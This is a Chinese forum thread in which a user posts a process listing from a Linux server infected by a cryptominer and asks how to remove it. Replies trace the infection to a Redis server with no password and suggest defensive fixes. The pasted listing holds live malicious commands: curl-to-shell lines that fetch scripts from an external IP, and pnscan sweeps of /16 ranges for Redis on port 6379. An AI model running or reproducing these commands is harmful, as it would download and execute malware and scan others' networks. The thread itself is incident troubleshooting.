这是一个创建于 2099 天前的主题,其中的信息可能已经有所发展或是发生改变。
root 2147 2838 1 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 172.108.0.0/16 6379 root 2379 1 12:45 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 2381 2379 0 12:45 ? 00:00:00 sh root 2409 1 0 12:45 ? 00:00:00 systemd
root 2650 2381 0 12:45 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 2652 2650 0 12:45 ? 00:00:00 bash root 2836 2652 0 12:46 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh root 2838 2836 0 12:46 ? 00:00:00 sh root 3180 1893 0 14:42 pts/0 00:00:00 ps -ef root 11431 24106 0 13:43 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh root 11433 11431 0 13:43 ? 00:00:00 sh root 17489 1 0 13:15 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 17491 17489 0 13:15 ? 00:00:00 sh root 19785 17491 0 13:15 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 19787 19785 0 13:15 ? 00:00:00 bash root 24104 31056 0 13:40 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 24106 24104 0 13:40 ? 00:00:00 bash root 29590 1 0 13:00 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 29592 29590 0 13:00 ? 00:00:00 sh root 29836 29592 0 13:00 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash root 29838 29836 0 13:00 ? 00:00:00 bash root 30220 19787 0 13:18 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/rsh.sh|sh root 30222 30220 0 13:18 ? 00:00:00 sh root 31054 1 0 13:30 ? 00:00:00 /bin/sh -c curl -fsSL http://116.62.122.90/sh.sh/ash.sh|sh root 31056 31054 0 13:30 ? 00:00:00 sh root 31492 632 2 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 137.152.0.0/16 6379 root 32517 30222 2 14:42 ? 00:00:00 /usr/local/bin/pnscan -t512 -R 6f 73 3a 4c 69 6e 75 78 -W 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a 100.47.0.0/16 6379
root 2650 2381 0 12:45 ? 00:00:00 bash -c curl -fsSL http://116.62.122.90/sh.sh/bsh.sh|bash 这个命令开机就开始跑 还他妈卸载我的 proc 文件系统,软件都跑不起了,怎么找到他在哪里啊 ,妈的我快气死了
 | 1 smartwusir007 2020-01-14 14:52:05 +08:00 哈哈,挖矿病毒 |
| 2 smartwusir007 2020-01-14 14:56:27 +08:00 是不是有很多 cron 进程,关掉了还会重启?你看看 redis 是不是开放了外网端口,没设密码?关掉试试 |
 | 3 aSmallNewbie OP @smartwusir007 对啊,我找不到他怎么自动启动起来 |
| 4 aSmallNewbie OP @smartwusir007 我去试下 |
 | 5 tankren 2020-01-14 15:01:04 +08:00  2 断网 先把 wget curl 卸载 再慢慢找 上次看到一个帖子 www 账号下去看 cron |
| 6 aSmallNewbie OP |
 | 7 z1154505909 2020-01-14 15:38:44 +08:00 我公司的内部服务器也中过挖矿, 同事说定时任务没跑,直接去找定时任务的日志,看到一个莫名奇妙的定时任务在跑.还老报错, 看了下文件,复制代码上网上搜了一下,挖矿的,清理了一圈, 原因就是 redis 没有设置密码, 以前都没有映射外网端口所以一直没事,后面因为一个项目要测试,开了一下,中招了 |
 | 8 Xusually 2020-01-14 15:48:38 +08:00 这恶意脚本还是托管在阿里云的,不去举报投诉一下? |
| 9 aSmallNewbie OP @Xusually 我们这是公司内网,映射到外网出了问题 |
 | 10 JoyBanana 2020-01-14 16:20:36 +08:00 via Android 论 redis 设置密码的重要性 |
| 11 Xusually 2020-01-14 16:24:15 +08:00 @aSmallNewbie 嗯 我知道,我是说这个恶意脚本以及其他资源是托管在阿里云的服务器上的,你找阿里云举报一下,他的这些作恶的资源可能阿里云会封停 |
 | 12 ps1aniuge 2020-01-14 16:45:20 +08:00 1 随着 linux 被挂马,被挖矿,被勒索增多。快过年之前,广大 it 安全督察人员(信息部锦衣卫)行动起来了,我很欣慰。 2 还有人讨厌 win 每月更新补丁么? 3 还在开门后一走了之?无门卫? |
 | 13 hfc 2020-01-15 09:50:28 +08:00 hosts 里把目标 ip 重定向到 127.0.0.1 |
Select Language